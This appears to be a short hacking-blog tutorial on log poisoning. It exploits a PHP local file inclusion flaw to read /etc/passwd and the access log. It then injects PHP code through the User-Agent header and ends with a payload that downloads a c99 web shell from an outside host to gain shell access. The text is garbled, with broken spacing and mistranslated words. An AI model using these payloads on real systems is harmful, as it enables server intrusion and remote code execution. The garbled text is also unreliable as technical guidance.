Log poisoning is a technique that not many know about.
this technique works only if you can make an LFI of the page.
if we say that you call index.php, which is vulnerable to LFI
and writes index.php? inc =../../../ var / www / logs / access.log

So you see that it will produce a logfile.
that looks something like this:
11.11.11.11 – – [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1” 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1” 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11”
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1” 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164” – “” Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”

As you can see logs serve our user-agent
If we change our user-agent to: <? Php echo ‘test’;?>
Can we hope the following restultat:
11.11.11.11 – – [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1” 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1” 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11”
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1” 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164” – “” test ”
As you can see, were running our PHP question.
change it as our user-agent to:
<? php fwrite (fopen ( ‘shell.php’, ‘w’), file_get_contents ( ‘hxxp: / / hack3r.org/path/to/c99.txt’)); die;?>
so it creates a file called shell.php with our shell script in.
And wopidoo, we have shell access.

Explore More

Hacking Banking

Here is process for hacking online banking and credit cards transactions and also a process to prevent from them . The Scenario You go to a coffee shop for a

USB drive identifies and extracts data, leaving no footprint

Harris Corporation introduced a highly customizable USB thumb drive that quickly extracts targeted data from computers. The device – called BlackJack – is designed for military, intelligence, and law enforcement

Koobface; The Facebook virus. Latest in the list of social networking virus

Virus developers are still targeting social networking users to distribute the virus. The “friendly nature” of the social networking sites makes it easier to spread the worm quickly. Most users